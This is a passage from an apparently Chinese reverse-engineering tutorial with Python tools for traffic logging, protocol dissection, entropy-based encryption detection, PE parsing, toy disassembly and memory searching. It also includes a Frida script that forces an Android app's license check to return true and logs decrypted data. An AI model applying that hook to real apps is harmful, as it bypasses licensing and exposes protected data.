        except ValueError:
            # Covers json.JSONDecodeError and UnicodeDecodeError: the body is
            # not JSON, so fall back to the raw bytes.
            print(f"请求数据: {flow.request.content}")
        else:
            print(f"请求数据: {json.dumps(data, indent=2, ensure_ascii=False)}")


def response(flow: http.HTTPFlow) -> None:
    """Log the status code and body of responses whose request URL contains "api".

    The body is pretty-printed when it parses as JSON and printed raw
    otherwise; a separator line closes each record.
    """
    if "api" not in flow.request.pretty_url:
        return

    print(f"[RESPONSE] {flow.response.status_code}")
    try:
        data = json.loads(flow.response.content)
    except (ValueError, TypeError):
        # ValueError: body is not JSON; TypeError: the body is None.
        print(f"响应数据: {flow.response.content}")
    else:
        print(f"响应数据: {json.dumps(data, indent=2, ensure_ascii=False)}")
    print("-" * 80)
协议分析
1. 自定义协议逆向
协议分析脚本
import struct
import binascii


class ProtocolAnalyzer:
    """Print a quick structural overview of raw protocol packets.

    Each packet is dumped as hex, its first 8 bytes are tentatively decoded
    as a big-endian ``(uint16, uint16, uint32)`` header, and simple byte
    patterns are reported.
    """

    def __init__(self):
        # Number of packets passed to analyze_packet so far.
        self.packet_count = 0

    def analyze_packet(self, data):
        """Dump one packet and return its tentative header.

        Args:
            data: Raw packet bytes.

        Returns:
            The ``(field1, field2, field3)`` tuple decoded from the first
            8 bytes, or ``None`` when the packet is shorter than 8 bytes.
        """
        self.packet_count += 1
        print(f"\n=== 数据包 #{self.packet_count} ===")
        print(f"原始数据: {binascii.hexlify(data).decode()}")
        print(f"数据长度: {len(data)} 字节")

        header = None
        if len(data) >= 8:
            # Big-endian: two 16-bit fields followed by one 32-bit field.
            header = struct.unpack('>HHI', data[:8])
            print(f"可能的包头结构:")
            print(f" 字段1 (2字节): 0x{header[0]:04x} ({header[0]})")
            print(f" 字段2 (2字节): 0x{header[1]:04x} ({header[1]})")
            print(f" 字段3 (4字节): 0x{header[2]:08x} ({header[2]})")

        self.find_patterns(data)
        return header

    def find_patterns(self, data):
        """Report adjacent repeated bytes and any printable text in *data*."""
        for position, (current, following) in enumerate(zip(data, data[1:])):
            if current == following:
                print(f"重复字节 0x{current:02x} 在位置 {position}")

        # errors='ignore' drops undecodable bytes, so decoding cannot raise.
        text = data.decode('utf-8', errors='ignore')
        if any(c.isprintable() for c in text):
            print(f"可能的文本: {repr(text)}")


# Usage example
analyzer = ProtocolAnalyzer()

# Simulated packets: an 8-byte header followed by an ASCII payload.
packets = [
    b'\x00\x01\x00\x10\x00\x00\x00\x20Hello World',
    b'\x00\x02\x00\x08\x00\x00\x00\x10Test',
    b'\x00\x03\x00\x0c\x00\x00\x00\x18Python',
]

for packet in packets:
    analyzer.analyze_packet(packet)
2. 加密协议分析
加密检测脚本
import math
from collections import Counter


def entropy_analysis(data):
    """Return the Shannon entropy of *data* in bits per byte.

    Args:
        data: A bytes-like object (any sequence of hashable symbols works).

    Returns:
        A value between 0 and 8 for byte input; 0.0 for empty input. The
        result can never exceed ``log2(len(data))``, so short samples score
        low even when they are random.
    """
    if not data:
        return 0.0

    length = len(data)
    # Sum p * log2(1/p); written with length/count so every term is >= 0.
    return sum(
        (count / length) * math.log2(length / count)
        for count in Counter(data).values()
    )


def detect_encryption(data):
    """Print a heuristic guess at whether *data* is encrypted.

    The guess is based on the byte entropy plus block-size hints: a length
    that is a multiple of 16 or 8 is consistent with AES or DES/3DES output.

    Args:
        data: A bytes-like object.

    Returns:
        The entropy that was computed, so callers can reuse it.
    """
    entropy = entropy_analysis(data)
    print(f"数据熵值: {entropy:.2f}")

    if entropy > 7.5:
        print("高熵值 - 可能是加密或压缩数据")
    elif entropy > 6.0:
        print("中等熵值 - 可能是编码数据")
    else:
        print("低熵值 - 可能是明文数据")

    # Block-size hints are meaningless for empty input: 0 is a multiple of
    # every block size, so skip them rather than report a false positive.
    if data:
        if len(data) % 16 == 0:
            print("数据长度是16的倍数 - 可能使用AES加密")
        if len(data) % 8 == 0:
            print("数据长度是8的倍数 - 可能使用DES/3DES加密")

    return entropy


# Exercise the detector on different kinds of data
test_data = [
    # Plain ASCII text.
    b"Hello World! This is plain text.",
    # 16 arbitrary bytes standing in for one cipher block.
    b'\x8f\x3a\x9c\x2e\x7b\x1d\x4f\x6a\x9e\x2c\x8b\x5f\x1a\x7d\x3e\x9c',
    # A single repeated byte: zero entropy.
    b"AAAAAAAAAAAAAAAA",
]

for i, data in enumerate(test_data):
    print(f"\n--- 测试数据 {i+1} ---")
    detect_encryption(data)
静态分析
1. PE文件分析
PE解析脚本
import struct
import os
import re


class PEAnalyzer:
    """Parse the DOS header and COFF file header of a PE file and list strings.

    Typical use: ``PEAnalyzer(path).analyze()``. The individual ``parse_*``
    methods return ``True`` on success and ``False`` (after printing a
    message where one exists) on malformed input.
    """

    def __init__(self, filepath):
        self.filepath = filepath
        self.data = None         # raw file bytes, filled by load_file()
        self.dos_header = None   # {'e_magic', 'e_lfanew'} after parse_dos_header()
        self.nt_headers = None   # selected file-header fields after parse_nt_headers()

    def load_file(self):
        """Read the whole file at ``self.filepath`` into ``self.data``."""
        with open(self.filepath, 'rb') as f:
            self.data = f.read()

    def _ensure_loaded(self):
        """Load the file on first use so callers need not call load_file()."""
        if self.data is None:
            self.load_file()

    def parse_dos_header(self):
        """Parse the 64-byte DOS header and validate the 'MZ' magic.

        Returns:
            True when the header is present and carries the MZ signature.
        """
        self._ensure_loaded()
        if len(self.data) < 64:
            return False

        # '<30HI': thirty little-endian 16-bit words (60 bytes) followed by
        # the 32-bit e_lfanew at offset 0x3C. It must be unpacked as an
        # integer because it is used below as a file offset.
        fields = struct.unpack('<30HI', self.data[:64])
        self.dos_header = {
            'e_magic': fields[0],
            'e_lfanew': fields[30],
        }

        # Check the DOS signature
        if self.dos_header['e_magic'] != 0x5A4D:  # 'MZ'
            print("错误: 不是有效的PE文件")
            return False

        print("DOS头解析成功")
        print(f"PE头偏移: 0x{self.dos_header['e_lfanew']:08x}")
        return True

    def parse_nt_headers(self):
        """Validate the 'PE\\0\\0' signature and parse the 20-byte file header.

        Returns:
            True on success; False when the DOS header is unavailable, the
            signature is missing/invalid, or the file is truncated.
        """
        if self.dos_header is None and not self.parse_dos_header():
            return False

        pe_offset = self.dos_header['e_lfanew']

        # Check the PE signature (also rejects an offset past end of file)
        if pe_offset + 4 > len(self.data):
            print("错误: PE签名无效")
            return False
        pe_signature = struct.unpack('<I', self.data[pe_offset:pe_offset+4])[0]
        if pe_signature != 0x00004550:  # 'PE\0\0'
            print("错误: PE签名无效")
            return False

        # Parse the file header that immediately follows the signature
        file_header_offset = pe_offset + 4
        if file_header_offset + 20 > len(self.data):
            print("错误: 不是有效的PE文件")
            return False
        file_header = struct.unpack(
            '<HHIIIHH', self.data[file_header_offset:file_header_offset+20]
        )
        self.nt_headers = {
            'machine': file_header[0],
            'number_of_sections': file_header[1],
            'time_date_stamp': file_header[2],
            'characteristics': file_header[6],
        }

        print(f"机器类型: 0x{self.nt_headers['machine']:04x}")
        print(f"节数量: {self.nt_headers['number_of_sections']}")
        print(f"特征值: 0x{self.nt_headers['characteristics']:04x}")
        return True

    def find_strings(self, min_length=4):
        """Return every run of printable ASCII at least *min_length* long.

        Runs that extend to the very end of the file are included.
        """
        self._ensure_loaded()
        # A run of zero characters is not a string; clamp to at least 1.
        quantifier = b'{' + str(max(1, min_length)).encode() + b',}'
        printable_run = re.compile(rb'[\x20-\x7E]' + quantifier)
        return [m.group().decode('ascii') for m in printable_run.finditer(self.data)]

    def analyze(self):
        """Run the full analysis: headers first, then the first ten strings."""
        self._ensure_loaded()
        print(f"分析文件: {self.filepath}")
        print(f"文件大小: {len(self.data)} 字节")

        if not self.parse_dos_header():
            return
        if not self.parse_nt_headers():
            return

        # Extract strings
        strings = self.find_strings()
        print(f"\n发现 {len(strings)} 个字符串:")
        for i, s in enumerate(strings[:10]):  # show only the first 10
            print(f" {i+1}: {s}")
        if len(strings) > 10:
            print(f" ... 还有 {len(strings) - 10} 个字符串")
2. 反汇编分析
简单反汇编器
import struct


class SimpleDisassembler:
    """Toy disassembler that recognises a small set of one-byte x86 opcodes."""

    def __init__(self):
        # x86 opcode -> mnemonic table (simplified). "imm32" marks opcodes
        # that are followed by a 32-bit little-endian immediate.
        self.opcodes = {
            0x90: "nop",
            0xC3: "ret",
            0x50: "push eax",
            0x51: "push ecx",
            0x52: "push edx",
            0x58: "pop eax",
            0x59: "pop ecx",
            0x5A: "pop edx",
            0xB8: "mov eax, imm32",
            0xB9: "mov ecx, imm32",
            0xBA: "mov edx, imm32",
        }

    def disassemble(self, code, base_addr=0x1000):
        """Translate *code* into a list of ``"0xADDR: text"`` lines.

        Args:
            code: the machine code bytes.
            base_addr: address assigned to the first byte of *code*.

        Returns:
            One string per decoded instruction; unknown bytes are emitted as
            ``db 0xNN``. When fewer than four bytes follow an imm32 opcode the
            mnemonic keeps its literal ``imm32`` placeholder and only the
            opcode byte is consumed.
        """
        listing = []
        end = len(code)
        pos = 0

        while pos < end:
            byte = code[pos]
            address = base_addr + pos

            # Unknown opcode: emit it as a raw data byte and move on.
            if byte not in self.opcodes:
                listing.append(f"0x{address:08x}: db 0x{byte:02x}")
                pos += 1
                continue

            mnemonic = self.opcodes[byte]
            length = 1

            # Immediate operand: needs bytes pos+1 .. pos+4 to be present.
            if "imm32" in mnemonic and pos + 4 < end:
                (value,) = struct.unpack_from('<I', code, pos + 1)
                mnemonic = mnemonic.replace("imm32", f"0x{value:08x}")
                length = 5

            listing.append(f"0x{address:08x}: {mnemonic}")
            pos += length

        return listing


# Test code
code = bytes([
    0x50,                          # push eax
    0xB8, 0x01, 0x00, 0x00, 0x00,  # mov eax, 1
    0x90,                          # nop
    0x58,                          # pop eax
    0xC3,                          # ret
])

disasm = SimpleDisassembler()
instructions = disasm.disassemble(code)

print("反汇编结果:")
for instr in instructions:
    print(instr)
动态分析
1. API监控
Windows API Hook
import ctypes
from ctypes import wintypes
import sys


class APIMonitor:
    """Holds handles to kernel32/user32 and builds logging API wrappers.

    Construction reads ``ctypes.windll``, which only exists on Windows.
    """

    def __init__(self):
        self.kernel32 = ctypes.windll.kernel32
        self.user32 = ctypes.windll.user32

    def hook_createfile(self):
        """Return a wrapper around ``kernel32.CreateFileW`` that logs each call.

        The wrapper is only returned; this method does not install it in
        place of the real API. It prints the file name, access mask and
        creation disposition, then forwards all seven arguments to the
        original function and returns its result.
        """
        print("[*] 开始监控CreateFile API...")

        # Keep a reference to the real API so the wrapper can forward to it
        real_createfile = self.kernel32.CreateFileW

        def hooked_createfile(filename, access, share, security, creation, flags, template):
            print("[API] CreateFile调用:")
            print(f" 文件名: {filename}")
            print(f" 访问权限: 0x{access:08x}")
            print(f" 创建方式: 0x{creation:08x}")

            # Forward to the original API unchanged
            forwarded = (filename, access, share, security, creation, flags, template)
            return real_createfile(*forwarded)

        return hooked_createfile


# Script for dynamic analysis with Frida
# JavaScript source for Frida. Every `//` comment sits on its own line so it
# cannot swallow the code that follows it, and the captured stack trace is
# actually written to the log.
frida_script = """
// Frida JavaScript代码
Java.perform(function() {
    // Hook Android应用的关键函数
    var MainActivity = Java.use("com.example.app.MainActivity");
    MainActivity.checkLicense.implementation = function(key) {
        console.log("[+] checkLicense called with key: " + key);

        // 记录调用栈
        console.log("[+] Call stack:");
        console.log(Java.use("android.util.Log").getStackTraceString(
            Java.use("java.lang.Exception").$new()));

        // 调用原始函数
        var result = this.checkLicense(key);
        console.log("[+] Original result: " + result);

        // 修改返回值
        console.log("[+] Returning true instead");
        return true;
    };

    // Hook加密函数
    var CryptoUtils = Java.use("com.example.app.CryptoUtils");
    CryptoUtils.decrypt.implementation = function(data) {
        console.log("[+] decrypt called with data: " + data);
        var result = this.decrypt(data);
        console.log("[+] Decrypted result: " + result);
        return result;
    };
});
"""
2. 内存分析
内存搜索脚本
import struct
import re


class MemoryAnalyzer:
    """Search a raw memory dump for byte patterns, strings and crypto constants."""

    def __init__(self, memory_dump):
        # The dump is kept as-is; all searches read from this buffer.
        self.memory = memory_dump

    def search_pattern(self, pattern):
        """Return the offsets of every (possibly overlapping) match of *pattern*.

        Args:
            pattern: bytes to look for; a ``str`` is encoded with the default
                codec first.

        Returns:
            Ascending list of start offsets. An empty pattern matches at every
            position from 0 to ``len(memory)`` inclusive.
        """
        if isinstance(pattern, str):
            pattern = pattern.encode()

        # A zero-width lookahead reports each start position without consuming
        # input, so overlapping occurrences are all found, and the scan runs
        # inside the regex engine instead of a Python-level byte loop.
        probe = b'(?=' + re.escape(pattern) + b')'
        return [m.start() for m in re.finditer(probe, self.memory)]

    def search_strings(self, min_length=4):
        """Find printable ASCII and UTF-16LE strings of at least *min_length* chars.

        Returns:
            A list of dicts with keys ``'offset'``, ``'string'`` and ``'type'``
            (``'ASCII'`` or ``'Unicode'``); all ASCII hits come first, each
            group in ascending offset order.
        """
        quantifier = b'{' + str(min_length).encode() + b',}'
        strings = []

        # ASCII strings: runs of printable bytes
        ascii_pattern = rb'[\x20-\x7E]' + quantifier
        for match in re.finditer(ascii_pattern, self.memory):
            strings.append({
                'offset': match.start(),
                'string': match.group().decode('ascii'),
                'type': 'ASCII',
            })

        # Unicode strings: printable byte + NUL pairs (UTF-16LE, ASCII range)
        unicode_pattern = rb'(?:[\x20-\x7E]\x00)' + quantifier
        for match in re.finditer(unicode_pattern, self.memory):
            try:
                decoded = match.group().decode('utf-16le')
            except UnicodeDecodeError:
                # Not expected for bytes matched by the pattern above; skip
                # the hit rather than abort the whole scan.
                continue
            strings.append({
                'offset': match.start(),
                'string': decoded,
                'type': 'Unicode',
            })

        return strings

    def find_crypto_constants(self):
        """Report which known crypto byte signatures occur in the dump.

        Returns:
            A list of ``{'name': ..., 'offsets': [...]}`` dicts, one per
            signature that was found at least once.
        """
        # NOTE(review): the MD5 and SHA1 entries are the same two 32-bit words
        # in opposite byte orders, so the labels are only hints; confirm.
        crypto_constants = {
            'AES S-Box': b'\x63\x7c\x77\x7b\xf2\x6b\x6f\xc5',
            'MD5 Constants': b'\x01\x23\x45\x67\x89\xab\xcd\xef',
            'SHA1 Constants': b'\x67\x45\x23\x01\xef\xcd\xab\x89',
        }

        found = []
        for name, constant in crypto_constants.items():
            matches = self.search_pattern(constant)
            if matches:
                found.append({'name': name, 'offsets': matches})
        return found


# Simulated memory data
memory_data = b"".join([
    b"Hello World\x00\x00\x00\x00",
    b"P\x00a\x00s\x00s\x00w\x00o\x00r\x00d\x00",  # Unicode "Password"
    b"\x63\x7c\x77\x7b\xf2\x6b\x6f\xc5",          # start of the AES S-Box
    b"Secret Key: 12345\x00",
    b"\x00" * 100,
])

analyzer = MemoryAnalyzer(memory_data)

print("=== 内存分析结果 ===")

# Search for strings
strings = analyzer.search_strings()
print(f"\n发现 {len(strings)} 个字符串:")
for s in strings:
    print(f" 0x{s['offset']:08x}: {s['type']} - {repr(s['string'])}")

# Search for crypto constants
crypto = analyzer.find_crypto_constants()
print(f"\n发现 {len(crypto)} 个加密常量:")
for c in crypto:
    print(f" {c['name']}: {[hex(offset) for offset in c['offsets']]}")
免责声明: 本文所述技术方案仅用于学习和研究目的,请在合法合规的前提下使用相关技术。